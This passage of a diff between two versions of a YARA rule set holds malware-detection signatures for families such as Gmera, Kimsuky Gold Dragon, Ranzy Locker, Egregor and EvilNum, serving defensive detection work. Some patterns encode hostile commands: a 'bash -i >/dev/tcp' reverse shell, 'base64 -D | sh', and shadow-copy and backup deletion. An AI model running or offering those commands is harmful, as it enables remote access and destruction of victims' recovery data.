-		$seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 }
-		$seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b }
-		$seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 }
+		$s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 }
+		$s2 = "\\assistant.sys" fullword wide
+		$s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 }
+		$s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 }
+		$s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 }
+		$s6 = "Release\\Dustman.pdb" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 25KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 4 of them
 }
-rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit"
+		description = "Detect Gold Dragon used by Kimsuky APT group"
 		author = "Arkbird_SOLG"
-		id = "acaba73d-f744-5d3f-9617-e976832f3577"
-		date = "2021-09-09"
-		modified = "2021-09-09"
-		reference = "https://github.com/StrangerealIntel/DailyIOC"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20"
+		id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804"
+		date = "2020-08-31"
+		modified = "2020-09-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184"
-		score = 50
+		logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		reference1 = "-"
-		hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455"
-		hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf"
-		hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185"
-		hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"
-		tlp = "White"
-		level = "experimental"
-		adversary = "-"
+		hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f"
+		hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448"
 
 	strings:
-		$x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 }
-		$x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 }
+		$s1 = "/c systeminfo >> %s" fullword ascii
+		$s2 = "/c dir %s\\ >> %s" fullword ascii
+		$s3 = ".?AVGen3@@" fullword ascii
+		$s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 }
+		$s5 = "%s?filename=%s" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii
+		$s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii
+		$s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
+		$s10 = "\\Microsoft\\HNC" fullword ascii
+		$s11 = "Mozilla/5.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize > 5KB and all of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize > 150KB and 8 of them
 }
-rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Gmera malware"
+		description = " Detect Ranzy Locker (RAAS)"
 		author = "Arkbird_SOLG"
-		id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d"
-		date = "2021-06-23"
-		modified = "2021-06-24"
-		reference = "https://twitter.com/BushidoToken/status/1407671196322258948"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25"
+		id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a"
+		date = "2020-11-19"
+		modified = "2020-11-19"
+		reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36"
 		license_url = "N/A"
-		logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99"
+		logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc"
 		score = 75
-		quality = 63
+		quality = 75
 		tags = "FILE"
-		hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1"
-		hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033"
-		hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2"
+		hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939"
+		hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79"
+		hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7"
+		hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9"
 
 	strings:
-		$s1 = "' | base64 -D | sh" fullword ascii
-		$s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 }
-		$s3 = "__mh_execute_header" fullword ascii
-		$s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 }
-		$s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 }
-		$s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 }
-		$s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 }
-		$s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 }
+		$s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
+		$s7 = "7B5549447D" ascii
+		$s8 = "7B5041545445524E5F49447D" ascii
+		$s9 = "726561646D652E747874" ascii
+		$s10 = "226E6574776F726B223A22" ascii
+		$s11 = "226C616E67223A22" ascii
+		$s12 = "7B4558547D" ascii
+		$s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838"
+		$s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
+		$s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
+		$s16 = "227375626964223A22" ascii
+		$s17 = "22657874223A22" ascii
+		$s18 = "226B6579223A22" ascii
+		$seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 }
+		$seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb }
 
 	condition:
-		( uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xbebafeca ) and filesize > 35KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 10 of ( $s* ) and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Egregor / Maze ransomware by Maze blocks"
+		description = "Detect LNK file used by EvilNum group"
 		author = "Arkbird_SOLG"
-		id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f"
-		date = "2020-10-29"
-		modified = "2023-11-22"
+		id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90"
+		date = "2020-07-13"
+		modified = "2021-07-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000"
+		logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4"
-		hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d"
-		hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb"
-		hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345"
+		hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554"
+		hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb"
+		hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3"
+		tlp = "white"
+		adversary = "EvilNum"
 
 	strings:
-		$x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 }
-		$x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 }
-		$x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 }
-		$op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 }
-		$op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 }
-		$op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 }
-		$op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 }
+		$s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide
+		$s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide
+		$s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s4 = "System32 (C:\\Windows)" fullword wide
+		$s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 }
+		$s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d }
+		$s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and ( 3 of ( $op* ) or 2 of ( $x* ) )
+		filesize > 60KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Hienote malware"
+		description = "Detect JS script used by EvilNum group"
 		author = "Arkbird_SOLG"
-		id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8"
-		date = "2020-06-26"
-		modified = "2023-11-22"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29"
+		id = "08b410c4-4899-5280-9735-6b3017c7a813"
+		date = "2020-07-13"
+		modified = "2021-07-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a"
+		logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68"
 		score = 75
-		quality = 61
+		quality = 69
 		tags = "FILE"
-		hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73"
+		hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72"
+		hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24"
+		hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679"
+		tlp = "white"
+		adversary = "EvilNum"
 
 	strings:
-		$s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d }
-		$s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d }
-		$s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 }
-		$s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 }
-		$s5 = { 44 65 62 75 67 49 6e 66 6f }
-		$s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d }
-		$s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a }
-		$s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a }
-		$s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a }
-		$s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 }
-		$s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii
-		$s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a }
-		$s13 = "User-Agent: %s" fullword ascii
-		$s14 = "Send failure: %s" fullword ascii
-		$s15 = "ftp://%s:%s@%s" fullword ascii
-		$s16 = "Host: %s%s%s" fullword ascii
-		$s17 = "Referer: %s" fullword ascii
+		$s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
+		$s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
+		$s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 }
+		$s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 }
+		$s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c }
+		$s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b }
